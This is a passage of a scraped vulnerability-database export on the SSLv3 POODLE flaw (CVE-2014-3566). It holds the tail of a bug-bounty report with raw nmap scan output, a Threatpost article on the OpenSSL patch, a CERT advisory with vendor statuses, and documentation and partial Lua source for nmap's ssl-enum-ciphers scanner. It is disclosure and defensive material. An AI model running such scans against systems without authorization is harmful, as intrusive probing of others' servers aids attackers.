https://nmap.org/cgi-bin/submit.cgi?new-service :\nSF-Port443-TCP:V=7.25BETA1%T=SSL%I=2%D=2/22%Time=5A8F9B45%P=x86_64-pc-linu\nSF:x-gnu%r(GetRequest,36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x\nSF:20CloudFront\\r\\nDate:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\nSF:\\nContent-Type:\\x20text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x\nSF:20close\\r\\nX-Cache:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x209\nSF:80b603eea89acb9f5bc806e2efdf82c\\.cloudfront\\.net\\x20\\(CloudFront\\)\\r\\nX\nSF:-Amz-Cf-Id:\\x200GA88OFJqyG4qDARfjyQ1jGVyWfzjEnIf0PKUOQI1r6-AuHswKbacw==\nSF:\\r\\n\\r\\n<!DOCTYPE\\x20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x\nSF:20Transitional//EN\\\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<\nSF:HTML><HEAD><META\\x20HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\nSF:\\x20charset=iso-8859-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20\nSF:not\\x20be\\x20satisfied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\\nSF:x20request\\x20could\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x2\nSF:0size=\\\"1px\\\">\\nBad\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\nSF:\\x20size=\\\"1px\\\">\\n<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\\(CloudFront\nSF:\\)\\nRequest\\x20ID:\\x200GA88OFJqyG4qDARfjyQ1jGVyWfzjEnIf0PKUOQI1r6-AuHsw\nSF:Kbacw==\\n</PRE>\\n<ADDRESS>\\n</ADDRESS>\\n</BODY></HTML>\")%r(HTTPOptions,\nSF:36B,\"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nServer:\\x20CloudFront\\r\\nDat\nSF:e:\\x20Thu,\\x2022\\x20Feb\\x202018\\x2016:40:40\\x20GMT\\r\\nContent-Type:\\x20\nSF:text/html\\r\\nContent-Length:\\x20551\\r\\nConnection:\\x20close\\r\\nX-Cache:\nSF:\\x20Error\\x20from\\x20cloudfront\\r\\nVia:\\x201\\.1\\x20e14935429e8b5cfb258b\nSF:503fe0233feb\\.cloudfront\\.net\\x20\\(CloudFront\\)\\r\\nX-Amz-Cf-Id:\\x20s4YG\nSF:LwviLFSBvGk8WD5Z0N2LIqbeVPqlxi2Y6JXysX-6zPgTxSvnSg==\\r\\n\\r\\n<!DOCTYPE\\x\nSF:20HTML\\x20PUBLIC\\x20\\\"-//W3C//DTD\\x20HTML\\x204\\.01\\x20Transitional//EN\\\nSF:\"\\x20\\\"http://www\\.w3\\.org/TR/html4/loose\\.dtd\\\">\\n<HTML><HEAD><META\\x2\nSF:0HTTP-EQUIV=\\\"Content-Type\\\"\\x20CONTENT=\\\"text/html;\\x20charset=iso-885\nSF:9-1\\\">\\n<TITLE>ERROR:\\x20The\\x20request\\x20could\\x20not\\x20be\\x20satisf\nSF:ied</TITLE>\\n</HEAD><BODY>\\n<H1>ERROR</H1>\\n<H2>The\\x20request\\x20could\nSF:\\x20not\\x20be\\x20satisfied\\.</H2>\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\nBad\nSF:\\x20request\\.\\n<BR\\x20clear=\\\"all\\\">\\n<HR\\x20noshade\\x20size=\\\"1px\\\">\\n\nSF:<PRE>\\nGenerated\\x20by\\x20cloudfront\\x20\\(CloudFront\\)\\nRequest\\x20ID:\\\nSF:x20s4YGLwviLFSBvGk8WD5Z0N2LIqbeVPqlxi2Y6JXysX-6zPgTxSvnSg==\\n</PRE>\\n<A\nSF:DDRESS>\\n</ADDRESS>\\n</BODY></HTML>\");\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 2 IP addresses (2 hosts up) scanned in 27.51 seconds\n\n```\n\n## Impact\n\nits vulnerable CVE-2014-3566", "edition": 2, "reporter": "h3r0es", "published": "2018-02-22T16:43:36", "title": "SEMrush: SSLv3 Poodle Attack on Ip Of semrush", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/147/580/38e2c92577fd689511b6272c709f3e2efccf43ad_small.jpg?1511661332"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "url": "/h3r0es", "hackerone_triager": false, "username": "h3r0es"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-3566"], "modified": "2018-03-13T14:31:05", "href": "https://hackerone.com/reports/318594", "id": "H1:318594", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:00", "_object_types": ["robots.models.base.Bulletin", "robots.models.threatpost.ThreatpostBulletin"], "references": ["https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844", "https://www.openssl.org/news/secadv_20141015.txt"], "description": "The OpenSSL Project has released a new version of the encryption software, which patches several security flaws, including the bug that is exploited by the [POODLE attack on SSLv3](<https://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>).\n\nThe updated versions of OpenSSL come just a couple of days after a trio of researchers at Google revealed the POODLE attack, which allows an attacker to force the use of SSLv3 in some circumstances and eventually decrypt the protected communications between the client and server. To address the issue, OpenSSL has added support for the TLS_FALLBACK_SCSV mechanism, which prevents attackers from being able to force downgrades from TLS to SSLv3.\n\n\u201cOpenSSL has added support for TLS_FALLBACK_SCSV to allow applications to block the ability for a MITM attacker to force a protocol downgrade,\u201d the advisory says.\n\n\u201cSome client applications (such as browsers) will reconnect using a downgraded protocol to work around interoperability bugs in older servers. This could be exploited by an active man-in-the-middle to downgrade connections to SSL 3.0 even if both sides of the connection support higher protocols. SSL 3.0 contains a number of weaknesses including POODLE (CVE-2014-3566).\u201d\n\nThe updated versions of OpenSSL also include a fix for a high-risk vulnerability in the DTLS SRTP extension that can cause a memory leak.\n\n\u201cA flaw in the DTLS SRTP extension parsing code allows an attacker, who sends a carefully crafted handshake message, to cause OpenSSL to fail to free up to 64k of memory causing a memory leak. This could be exploited in a Denial Of Service attack. This issue affects OpenSSL 1.0.1 server implementations for both SSL/TLS and DTLS regardless of whether SRTP is used or configured. Implementations of OpenSSL that have been compiled with OPENSSL_NO_SRTP defined are not affected,\u201d the [advisory](<https://www.openssl.org/news/secadv_20141015.txt>) says.\n\nThere also is a patch for a low-risk vulnerability that results from a problem in the \u201cno-ssl3\u201d build option that could still allow servers to complete an SSLv3 handshake.\n", "reporter": "Dennis Fisher", "published": "2014-10-16T10:29:53", "type": "threatpost", "title": "OpenSSL Releases Patch for POODLE Attack", "enchantments": {"score": {"modified": "2018-10-06T22:58:00", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.threatpost.ThreatpostBulletin", "modified": "2014-10-16T14:29:53", "id": "THREATPOST:6B6CA377F53631E389C8D36D80FC782A", "href": "https://threatpost.com/openssl-releases-patch-for-poodle-attack/108875/", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2018-12-25T20:18:31", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"], "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://www.openssl.org/news/secadv_20141015.txt", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://www.us-cert.gov/ncas/alerts/TA14-290A"], "description": "### Overview \n\nMany modern TLS clients can fall back to version 3.0 of the SSL protocol, which is vulnerable to a padding-oracle attack when Cypher-block chaining (CBC) mode is used. This is commonly referred to as the \"POODLE\" (Padding Oracle On Downgraded Legacy Encryption) attack.\n\n### Description \n\n[**CWE-327**](<http://cwe.mitre.org/data/definitions/327.html>)**: Use of a Broken or Risky Cryptographic Algorithm** \\- CVE-2014-3566\n\nMultiple implementations of SSL 3.0, including the implementation in OpenSSL up to version 1.0.1i, support the use of CBC mode. However, SSL 3.0 is vulnerable to a padding-oracle attack when CBC mode is used. A successful padding-oracle attack can provide an attacker with cleartext information from the encrypted communications. \n \nAdditionally, many modern TLS clients still support the ability to fall back to the SSL 3.0 protocol in order to communicate with legacy servers. A man-in-the-middle attacker may be able to force the protocol version negotiation sequence to downgrade to SSL 3.0, thereby opening up the opportunity to exploit the padding-oracle attack. \n \nFor more information, please refer to the original [security advisory](<https://www.openssl.org/~bodo/ssl-poodle.pdf>)[](<https://www.openssl.org/~bodo/ssl-poodle.pdf>). \n \n--- \n \n### Impact \n\nAn adjacent, unauthenticated attacker may be able to derive cleartext information from communications that utilize the SSL 3.0 protocol with CBC mode. \n \n--- \n \n### Solution \n\nOpenSSL [has fixed](<https://www.openssl.org/news/secadv_20141015.txt>) the issue in OpenSSL versions 1.0.1j, 1.0.0o, and 0.9.8zc. For other implementations of the protocol, please check with the appropriate maintainer or vendor to determine if the implementation is affected by this issue. Additionally, consider the following workaround: \n \n--- \n \n**Use TLS_FALLBACK_SCSV** \n \nIf disabling SSL 3.0 is not possible, TLS client and server implementations should make use of the [TLS_FALLBACK_SCSV](<https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00>) cipher suite value to prevent man-in-the-middle attackers from forcing unnecessary protocol downgrades. \n \n--- \n \n### Vendor Information\n\n577193\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Inc. \n\nUpdated: October 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.apple.com/kb/HT6531>\n\n### __ __ Aruba Networks, Inc. \n\nNotified: October 17, 2014 Updated: October 20, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nAruba has published an [advisory](<http://www.arubanetworks.com/support/alerts/aid-10142014.txt>). Users should refer to the [advisory](<http://www.arubanetworks.com/support/alerts/aid-10142014.txt>) for up-to-date information.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://www.arubanetworks.com/support/alerts/aid-10142014.txt>\n\n### __ __ Attachmate \n\nNotified: October 17, 2014 Updated: October 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nAttachmate has released an [advisory](<http://support.attachmate.com/techdocs/2750.html>).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://support.attachmate.com/techdocs/2750.html>\n\n### __ __ Microsoft Corporation \n\nNotified: October 17, 2014 Updated: January 21, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n<https://technet.microsoft.com/en-us/library/security/3009008.aspx>\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Mozilla \n\nUpdated: October 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/>\n\n### __ __ NEC Corporation \n\nUpdated: October 28, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n\"We provide information on this issue at the following URL:\n\n<http://jpn.nec.com/security-info/av14-004.html>\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<http://jpn.nec.com/security-info/av14-004.html>\n\n### __ __ Novell, Inc. \n\nUpdated: October 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNovell has released an [advisory](<https://www.novell.com/support/kb/doc.php?id=7015777>).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://www.novell.com/support/kb/doc.php?id=7015777>\n\n### __ OpenSSL \n\nUpdated: October 17, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ SUSE Linux \n\nUpdated: October 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nSUSE has released an [advisory](<https://www.suse.com/support/kb/doc.php?id=7015773>).\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://www.suse.com/support/kb/doc.php?id=7015773>\n\n### __ __ Legion of the Bouncy Castle \n\nNotified: October 17, 2014 Updated: October 20, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\n\"Bouncy Castle Java APIs version 1.46, or later, offer the ability to access SSL v3 by overriding methods in order to allow support for it. By default SSL v3 support is turned off.\n\nIt is possible to see if a developer has created the necessary overrides by looking for overrides of the methods AbstractTlsClient.getMinimumVersion () or TlsClient.notifyServerVersion () in client code, and by looking for overrides of AbstractTlsServer.getMinimumVersion () or TlsServer.getServerVersion () in server code. \n \nBouncy Castle C# APIs version 1.8 (still in beta), also contains a TLS API, which follows the same profile as the Bouncy Castle Java APIs in respect to SSL v3. Support for \u201cTLS Fallback Signaling Cipher Suite Value (SCSV) for Preventing Protocol Downgrade Attacks\u201d, currently described at \n \n<https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00> \n \nhas been added to both the Java and C# APIs to allow developers to prevent SSL v3 as anything but a worst case. We are planning to continue tracking the fallback document as it evolves and will include the results in the next releases of the Java and C# APIs (1.52 and 1.8 respectively) \n \nFor further enquiries in relation to this please contact us at [office@bouncycastle.org](<mailto:office@bouncycastle.org>).\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n<https://www.bouncycastle.org/>\n\n### __ __ PeerSec Networks \n\nNotified: October 17, 2014 Updated: October 20, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\n\"MatrixSSL version support is configured with compile-time define, and we have disabled SSL3.0 by default since MatrixSSL 3.3.1 on July 16, 2012.\n\nAnyone using MatrixSSL over the past 2 years would have had to manually enable SSL 3.0. Also, we do TLS style padding for SSL3.0 since the beginning for record encoding, however we can\u00b9t enforce it on decoding, so that was of limited use unless communicating with our own library\"\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Apache HTTP Server Project \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Apache-SSL \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Botan \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Certicom \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Cryptlib \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Crypto++ Library \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ EMC Corporation \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ F5 Networks, Inc. \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ GnuTLS \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ IAIK Java Group \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Mirapoint, Inc. \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Mozilla - Network Security Services \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ National Center for Supercomputing Applications \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Netscape NSS \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Nettle \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Nokia \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ SafeNet \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Spyrus \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ Stunnel \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ libgcrypt \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ mod_ssl \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### __ wolfSSL \n\nNotified: October 17, 2014 Updated: October 17, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 4.3 | AV:N/AC:M/Au:N/C:P/I:N/A:N \nTemporal | 3.6 | E:F/RL:OF/RC:C \nEnvironmental | 3.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.openssl.org/~bodo/ssl-poodle.pdf>\n * <https://www.openssl.org/news/secadv_20141015.txt>\n * <https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00>\n * <https://www.us-cert.gov/ncas/alerts/TA14-290A>\n\n### Credit\n\nThis document was written by Todd Lewellen. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-3566](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566>) \n---|--- \n**Date Public:** | 2014-10-14 \n**Date First Published:** | 2014-10-17 \n**Date Last Updated: ** | 2015-01-21 19:34 UTC \n**Document Revision: ** | 28 \n", "reporter": "CERT", "published": "2014-10-17T00:00:00", "type": "cert", "title": "POODLE vulnerability in SSL 3.0", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "info", "cvelist": ["CVE-2014-3566"], "_object_type": "robots.models.cert.CertBulletin", "modified": "2015-01-21T19:34:00", "id": "VU:577193", "href": "https://www.kb.cert.org/vuls/id/577193", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nmap": [{"lastseen": "2018-08-28T16:23:34", "references": [], "description": "This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the ciphersuites and compressors that a server accepts. \n\nEach ciphersuite is shown with a letter grade (A through F) indicating the strength of the connection. The grade is based on the cryptographic strength of the key exchange and of the stream cipher. The message integrity (hash) algorithm choice is not a factor. The output line beginning with `Least strength` shows the strength of the weakest cipher offered. The scoring is based on the Qualys SSL Labs SSL Server Rating Guide, but does not take protocol support (TLS version) into account, which makes up 30% of the SSL Labs rating. \n\nSSLv3/TLSv1 requires more effort to determine which ciphers and compression methods a server supports than SSLv2. A client lists the ciphers and compressors that it is capable of supporting, and the server will respond with a single cipher and compressor chosen, or a rejection notice. \n\nSome servers use the client's ciphersuite ordering: they choose the first of the client's offered suites that they also support. Other servers prefer their own ordering: they choose their most preferred suite from among those the client offers. In the case of server ordering, the script makes extra probes to discover the server's sorted preference list. Otherwise, the list is sorted alphabetically. \n\nThe script will warn about certain SSL misconfigurations such as MD5-signed certificates, low-quality ephemeral DH parameters, and the POODLE vulnerability. \n\nThis script is intrusive since it must initiate many connections to a server, and therefore is quite noisy. \n\nIt is recommended to use this script in conjunction with version detection (`-sV`) in order to discover SSL/TLS services running on unexpected ports. For the most common SSL ports like 443, 25 (with STARTTLS), 3389, etc. the script is smart enough to run on its own. \n\nReferences: \n\n * Qualys SSL Labs Rating Guide - https://www.ssllabs.com/projects/rating-guide/\n\n## Script Arguments \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n## Example Usage \n \n \n nmap -sV --script ssl-enum-ciphers -p 443 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | ssl-enum-ciphers:\n | TLSv1.0:\n | ciphers:\n | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n | compressors:\n | NULL\n | cipher preference: server\n | warnings:\n | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n | Broken cipher RC4 is deprecated by RFC 7465\n | Ciphersuite uses MD5 for message integrity\n | Weak certificate signature: SHA1\n | TLSv1.2:\n | ciphers:\n | TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A\n | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n | TLS_ECDHE_ECDSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_ECDHE_RSA_WITH_RC4_128_SHA (secp256r1) - C\n | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C\n | TLS_RSA_WITH_RC4_128_MD5 (rsa 2048) - C\n | compressors:\n | NULL\n | cipher preference: server\n | warnings:\n | 64-bit block cipher 3DES vulnerable to SWEET32 attack\n | Broken cipher RC4 is deprecated by RFC 7465\n | Ciphersuite uses MD5 for message integrity\n |_ least strength: C\n \n\n## Requires \n\n * coroutine\n * math\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * table\n * tls\n * openssl\n\n* * *\n", "edition": 17, "reporter": "Mak Kolybabi <mak@kolybabi.com>, Gabriel Lawrence", "published": "2015-07-10T17:06:28", "title": "ssl-enum-ciphers NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-08-27T22:00:14", "id": "NMAP:SSL-ENUM-CIPHERS.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-enum-ciphers.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal sslcert = require \"sslcert\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tls = require \"tls\"\n\ndescription = [[\nThis script repeatedly initiates SSLv3/TLS connections, each time trying a new\ncipher or compressor while recording whether a host accepts or rejects it. The\nend result is a list of all the ciphersuites and compressors that a server accepts.\n\nEach ciphersuite is shown with a letter grade (A through F) indicating the\nstrength of the connection. The grade is based on the cryptographic strength of\nthe key exchange and of the stream cipher. The message integrity (hash)\nalgorithm choice is not a factor. The output line beginning with\n<code>Least strength</code> shows the strength of the weakest cipher offered.\nThe scoring is based on the Qualys SSL Labs SSL Server Rating Guide, but does\nnot take protocol support (TLS version) into account, which makes up 30% of the\nSSL Labs rating.\n\nSSLv3/TLSv1 requires more effort to determine which ciphers and compression\nmethods a server supports than SSLv2. A client lists the ciphers and compressors\nthat it is capable of supporting, and the server will respond with a single\ncipher and compressor chosen, or a rejection notice.\n\nSome servers use the client's ciphersuite ordering: they choose the first of\nthe client's offered suites that they also support. Other servers prefer their\nown ordering: they choose their most preferred suite from among those the\nclient offers. In the case of server ordering, the script makes extra probes to\ndiscover the server's sorted preference list. Otherwise, the list is sorted\nalphabetically.\n\nThe script will warn about certain SSL misconfigurations such as MD5-signed\ncertificates, low-quality ephemeral DH parameters, and the POODLE\nvulnerability.\n\nThis script is intrusive since it must initiate many connections to a server,\nand therefore is quite noisy.\n\nIt is recommended to use this script in conjunction with version detection\n(<code>-sV</code>) in order to discover SSL/TLS services running on unexpected\nports. For the most common SSL ports like 443, 25 (with STARTTLS), 3389, etc.\nthe script is smart enough to run on its own.\n\nReferences:\n* Qualys SSL Labs Rating Guide - https://www.ssllabs.com/projects/rating-guide/\n]]\n\n---\n-- @usage\n-- nmap -sV --script ssl-enum-ciphers -p 443 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | ssl-enum-ciphers:\n-- | TLSv1.0:\n-- | ciphers:\n-- | TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (secp256r1) - A\n-- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (secp256r1) - A\n-- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A\n-- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A\n-- | TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (secp256r1) - C\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C\n-- | 